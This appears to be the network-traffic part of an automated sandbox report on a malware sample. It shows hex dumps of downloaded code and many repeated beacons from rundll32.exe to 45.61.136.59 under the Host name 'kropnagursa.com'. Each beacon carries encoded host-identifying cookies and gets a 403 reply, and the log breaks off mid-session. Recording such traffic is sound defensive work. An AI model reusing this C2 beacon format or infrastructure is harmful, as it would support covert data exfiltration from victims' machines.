                                                                                                                                            Feb 2, 2023 21:16:56.520402908 CET445INData Raw: 8d 71 18 4c 89 f1 ff 15 57 f8 15 00 45 31 ed 4c 89 e1 48 89 f2 41 b0 01 45 31 c9 e8 b3 f1 ff ff 48 85 c0 0f 84 c7 00 00 00 48 89 c7 48 89 c5 48 81 e5 00 00 f0 ff 48 8d 43 ff 48 21 f8 74 66 48 29 c3 48 29 de 48 85 db 74 44 89 f8 c1 e8 0c 44 0f b6
                                                                                                                                            Data Ascii: qLWE1LHAE1HHHHHCH!tfH)H)HtDDHHHHK@HT0HHLHIHD0LHE1HIL9tULH)HLILHLHH@HT0L)HHHIHt0LLHE1HM|$XL
                                                                                                                                            Feb 2, 2023 21:16:56.520423889 CET447INData Raw: 8b 50 28 48 8d 34 0a 48 39 fe 0f 87 8d 00 00 00 48 39 f9 0f 83 84 00 00 00 48 8b 40 18 48 83 e0 fe 48 85 c0 75 d0 48 8d 0d 90 95 17 00 ff 15 2a f4 15 00 48 8d 0d d3 8e 17 00 48 89 da e8 ab 43 00 00 48 85 c0 74 0f 89 f8 25 ff ff 0f 00 48 3d ff 2f
                                                                                                                                            Data Ascii: P(H4H9H9H@HHuH*HHCHt%H=/wAWAFH([_^A^HL@JL0uBHAI~IFAINIVHH([_^A^H%u6HHX(HH9uL@H)HLH t
                                                                                                                                            Feb 2, 2023 21:16:56.520445108 CET448INData Raw: 53 ee 15 00 4c 89 e0 4c 89 64 24 40 4c 01 e5 48 81 fd fe 00 00 00 77 7e 4c 8d 24 6d 00 00 00 00 49 01 ec 4a 8b 44 e3 30 a8 01 75 6a 48 25 00 f0 ff ff 48 3b 44 24 30 72 5d 48 c1 e5 0c 48 01 dd c6 44 24 20 00 4c 89 f1 48 89 ea 4c 8b 44 24 30 41 b1
                                                                                                                                            Data Ascii: SLLd$@LHw~L$mIJD0ujH%H;D$0r]HHD$ LHLD$0At:JH0HHL$@HIHt0HHD$0IFXHL$8HL$8A~qLt]HHHLcL1HHAE1HtHkXHL
                                                                                                                                            Feb 2, 2023 21:16:56.545648098 CET449INData Raw: 89 01 c7 04 25 00 00 00 00 4e 0f 00 00 e8 2f 97 11 00 48 8d 05 15 b5 11 00 48 8b 0d c1 b9 11 00 48 89 01 c7 04 25 00 00 00 00 69 05 00 00 e8 0e 97 11 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 48 83 ec 20 48 8d 0d 3c 8b 17 00 ff 15 fe e8 15
                                                                                                                                            Data Ascii: %N/HHH%iVH H<H5Ht HHHHH ^HH ^F VWH(HH=HHHH5HH(_^H%vAWAVVWSH DHI


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            10192.168.2.44970645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:03.163587093 CET2120OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:03.338604927 CET2121INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:03 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            100192.168.2.44979645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:01.468103886 CET2236OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:01.632934093 CET2237INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:01 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            101192.168.2.44979745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:01.946309090 CET2238OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:02.110975027 CET2238INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:02 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            102192.168.2.44979845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:02.800074100 CET2239OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:02.964988947 CET2239INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:02 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            103192.168.2.44979945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:03.279248953 CET2240OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:03.447101116 CET2240INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:03 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            104192.168.2.44980045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:03.788785934 CET2241OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:03.957518101 CET2242INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:03 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            105192.168.2.44980145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:04.275414944 CET2243OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:04.443274975 CET2243INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:04 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            106192.168.2.44980245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:04.912811041 CET2244OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:05.080797911 CET2244INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:04 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            107192.168.2.44980345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:05.557442904 CET2245OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:05.722491980 CET2246INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:05 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            108192.168.2.44980445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:06.231604099 CET2246OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:06.396373034 CET2247INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:06 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            109192.168.2.44980545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:06.695055008 CET2248OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:06.862205982 CET2248INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:06 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            11192.168.2.44970745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:04.080080986 CET2122OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:04.245735884 CET2122INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:04 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            110192.168.2.44980645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:07.580307961 CET2249OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:07.748193979 CET2249INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:07 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            111192.168.2.44980745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:08.242496014 CET2250OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:08.410335064 CET2251INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:08 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            112192.168.2.44980845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:08.715625048 CET2251OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:08.880453110 CET2252INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
